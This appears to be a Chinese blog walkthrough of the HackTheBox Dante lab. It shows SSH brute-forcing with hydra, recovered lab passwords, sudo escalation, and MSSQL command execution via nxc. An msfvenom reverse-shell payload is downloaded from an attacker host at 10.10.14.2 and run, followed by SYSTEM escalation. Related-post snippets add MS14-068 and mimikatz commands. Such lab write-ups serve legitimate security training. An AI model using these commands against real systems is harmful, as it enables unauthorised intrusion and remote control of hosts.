用脚本ping,网段存活主机,发现127.16.2.6

172.16.2.6

枚举

使用ligolo-ng搭建隧道
nmap扫描:
在这里插入图片描述
发现只有22端口,尝试ssh爆破

hydra -L /home/kali/Desktop/Dante_prolabs/users.txt -P /home/kali/Desktop/Dante_prolabs/password.txt ssh://172.16.2.6 -vV

发现两个凭据

julian:manchesterunited
plongbottom:PowerfixSaturdayClub777

在这里插入图片描述
发现flag
在这里插入图片描述
在julian目录里可以发现SQL文件

Hi Julian
I've put this on your personal desktop as its probably the most secure 
place on the network!

Can you please ask Sophie to change her SQL password when she logs in
again? I've reset it to TerrorInflictPurpleDirt996655 as it stands, but
obviously this is a tough one to remember

Maybe we should all get password managers?

Thanks,
James

得到 Sophie : TerrorInflictPurpleDirt996655
用这个凭证扫描172.16.1.0/24网段,发现172.16.1.5管理权限,可以稍后去利用

在这里插入图片描述

切换用户
在这里插入图片描述
发现是27(sudo)组
查看sudo -l
在这里插入图片描述
sudo /bin/bash
成功提权

172.1.16.5

枚举

端口扫描

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp?
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     500 Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|   DNSVersionBindReqTCP, RPCCheck: 
|     500 Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|   GetRequest, HTTPOptions: 
|     500 Syntax error, command unrecognized.
|   Help: 
|     214-The following commands are recognized:
|     ABOR ADAT ALLO APPE AUTH CDUP CLNT CWD 
|     DELE EPRT EPSV FEAT HASH HELP LIST MDTM
|     MFMT MKD MLSD MLST MODE NLST NOOP NOP 
|     OPTS PASS PASV PBSZ PORT PROT PWD QUIT
|     REST RETR RMD RNFR RNTO SITE SIZE STOR
|     STRU SYST TYPE USER XCUP XCWD XMKD XPWD
|     XRMD
|     Have a nice day.
|   RTSPRequest: 
|     220 Dante Staff Drop Box
|     Syntax error, command unrecognized.
|   SSLSessionReq: 
|     500 Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|     Syntax error, command unrecognized.
|_    Syntax error, command unrecognized.
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   172.16.1.5\SQLEXPRESS: 
|     Instance name: SQLEXPRESS
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
|_ssl-date: 2025-04-12T07:47:14+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-11T09:27:32
|_Not valid after:  2055-04-11T09:27:32
| ms-sql-ntlm-info: 
|   172.16.1.5\SQLEXPRESS: 
|     Target_Name: DANTE-SQL01
|     NetBIOS_Domain_Name: DANTE-SQL01
|     NetBIOS_Computer_Name: DANTE-SQL01
|     DNS_Domain_Name: DANTE-SQL01
|     DNS_Computer_Name: DANTE-SQL01
|_    Product_Version: 10.0.14393
2049/tcp open  nlockmgr     1-4 (RPC #100021)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

NFS 2049

获取 NFSv3 服务器的信息
showmount -e
没有挂载信息

拿shell

得到 Sophie : TerrorInflictPurpleDirt996655
用这个凭证扫描mssql 172.16.1.5 显示管理权限
在这里插入图片描述
因为用户有管理权限可以直接利用

  1. impacket-mssqlclient
  2. nxc或者 crackmapexec
  3. msf:use exploit/windows/mssql/mssql_payload
impacket-mssqlclient sophie@172.16.1.5

在这里插入图片描述
然后使用 xp_cmdshell,后面不写了

nxc mssql 172.16.1.5 -u 'sophie' -p 'TerrorInflictPurpleDirt996655' --local-auth -x 'whoami'

在这里插入图片描述
成功执行代码
或者
msf,直接拿到shell,方便快捷
在这里插入图片描述
用nxc:
先生成一个木马

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=4422 -f exe -o hack.exe

下载

nxc mssql 172.16.1.5 -u 'sophie' -p 'TerrorInflictPurpleDirt996655' --local-auth -x 'powershell iwr -uri 10.10.14.2/hack.exe -o c:\Users\Public\hack.exe'

在这里插入图片描述
拿到shell:

nxc mssql 172.16.1.5 -u 'sophie' -p 'TerrorInflictPurpleDirt996655' --local-auth -x 'c:\Users\Public\hack.exe'

在这里插入图片描述
cat c:\Users\flag.txt
拿到flag

提权

whoami /priv
在这里插入图片描述
发现有SeImpersonatePrivilege 权限,可以直接用土豆系列提权或者meterpreter直接提权getsystem
在这里插入图片描述
提权成功

CentOS使用Dantedante-server)建立Socks5代理,Socks5(Socket Secure)服务器搭建,代理服务器搭建,可配置单用户认证,防止端口裸奔,可实现网络加速
qq_44839815的博客
05-15 3740
如果只想配置一个外部网络接口,记下相应的网络接口名称,如果不知道哪个适合,可以全部记下,后面全部配置。作为身份验证,也可以再新增一个用户专门进行SOCKS5的身份验证。您可先查看配置内容,理解配置项后,进行配置准备。(非必要步骤)查看该服务的配置,无需修改。是固定的,不是自己任意取的用户名。指定了是否开启身份验证,值为。安装后,会生成一个名为。创建目录存放该服务的。
CVE-2022–26923漏洞分析
阿道夫的博客
01-31 1341
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD中涉及身份认证标识的问题不止一次,微软在AD中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD证书有效时间长,因此对于AD的提权和权限维持都有很高的利用价值。一次,微软在AD中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。
「运维有小邓」你知道吗?你的 Active Directory 存在安全漏洞
运维有小邓
04-08 1308
ADSelfService Plus是一款自助的AD密码管理方案。其实现了用户自助远程密码管理。用户可以在家,或除单位的其他地方对密码进行重置。
AD渗透测试笔记
渗透测试研究中心
12-16 5296
0X00渗透-Kerberos 1.Kerberos简介 在Kerberos认证中,最主要的问题是如何证明“你是你”的问题,如当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是Kerberos解决的问题。在渗透过程中Kerberos协议的攻防也是很重要的存在。 2.Kerberos协议框架 在Kerberos协议中主要是有三个角色的存在: 访问服..
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1498
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
渗透相关内网AD环境搭建 环境收集方式方法命令 查看 检测控主机或者内主机是否安装杀软方式
最新发布
浩策盾悟
10-24 1万+
AD使用了一种结构化的数据存储方式,在一个活动目录中可以根据需要建立多个.活动目录这种层次结构使企业网络具有极强的扩展性,便于组织、管理以及目录定位。而如果你的计算机加入的话,各种策略是控制器统一设定,用户名和密码也是放到控制器去验证,也就是说你的账号密码可以在同一的任何一台计算机登录。对于有一些经验的小伙伴 cs肯定知道是什么,如果是小白,改天有空我写写cs是什么常规操作是什么,希望对你们有所帮助!在架构中用来管理所有客户端的服务器,是架构的核心,因为所有的用户信息都被集中存储,
Dante技术要点及其应用详解--音频爱好者必看
12-06
当跟随外部时钟源时,设备需在短时间内锁定时钟,但若外部时钟源不稳定,Dante设备会自我校正并重新同步,可能会导致短暂的声音中断。理想的同步时钟偏差应小于±1μs,而在实际应用中,良好的网络环境可将抖动控制...
网络游戏-Dante网络音量采集终端.zip
09-19
在网络游戏场景中,Dante技术的应用能够确保即便在网络环境复杂的情况下,音频数据也能稳定、实时地传输,从而保证游戏内的语音通信和环境音效的流畅性。 Dante网络音量采集终端是这一技术的具体实现,它集成了音量...
docker-dante-telegram:Telegram SOCKS-proxy和Dockerfile的dante配置生成器,用于使用此类代理构建映像
02-05
dante配置可以使用 ruby dante_config_generator.rb [FILENAME] 结果将被写入FILENAME (默认情况下为danted.conf ),并且可以在存储库中找到:身份(仅具有未认证的Telegram IP)和经过(具有用户名/密码身份验证...
dante-1.1.1.tar.gz_dante_dante tar gz_socks_socks linux_udp sock
07-15
dante-1.1.1.tar.gz_dante_dante tar gz_socks_socks linux_udp sock
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
htb(二)
wanan的博客
03-11 3416
htb(二)
Ligolo-ng 安装与使用教程
gitblog_00009的博客
08-10 660
Ligolo-ng 安装与使用教程 ligolo-ngAn advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.项目地址:https://gitcode.com/gh_mirrors/li/ligolo-ng 1. 项目介绍 Ligolo-ng 是一个轻量级、快速的工具,专为渗透测试者设计,用于通过反向T...
AD安全攻防实践(附攻防矩阵图)
03-11 3660
控为基础架构,通过控实现对用户和计算机资源的统一管理,带来便利的同时也成为了最受攻击者重点攻击的集权系统。01、攻击篇针对控的攻击技术,在Windows通用攻击技术的基础上自成一套技术体系,将AD攻防分为信息收集、权限提升、凭证窃取、横向移动、权限维持等攻击阶段,把环境下众多且繁杂的攻击行为映射到ATT&CK,梳理成一个AD攻防矩阵图。(1)内信息收集当攻击者获得内网某台...
AD渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2813
漏洞编号MS14-068的漏洞,将允许任意用户提升到管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
Python教程大纲
restart
01-24 5400
缘起:最近想在部门推Python语言,写这个blog主要就是个教程大纲,之前先列出一些资源: Python中文社区主站入口:http://woodpecker.org.cn/ 《Python学习手册》@豆瓣:http://book.douban.com/subject/6049132/ 《Python标准库》@豆瓣:http://book.douban.com/subject/1077332
超详细的渗透过程!
xiaoi123的博客
05-02 1万+
大家好!我们在这个write up 里讲下几个不同的入侵 windows domian 时的横向操作。 内容不会过于深入,而会介绍一些基本技巧和流程. 为了保证测试客观性所以我将使用我们的测试对象 lock domain “REDHOOK”. 希望这会成为我们第一个关于 windows domian 的系列教程. 如果你要具体了解某些细节(比如kerberos 的 tickets)欢迎发email...
Active Directory(AD环境本地测试(外加部分内网渗透命令)
RickGray
07-28 7165
基本概念 活动目录(Active Directory):简单的说,活动目录是实现环境的一个载体,要想实现一个大型的环境组织和管理,通过AD可以轻松地实现。AD存储了有关网络对象(objects)的信息,并让管理员和用户都能够很轻松地查找和使用这些信息。AD使用的是一种结构化的数据存储方式,并以此为基础对目录信息进行合乎逻辑的分层组织。 林(Forest):一个或多个树组成了林,同一林
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值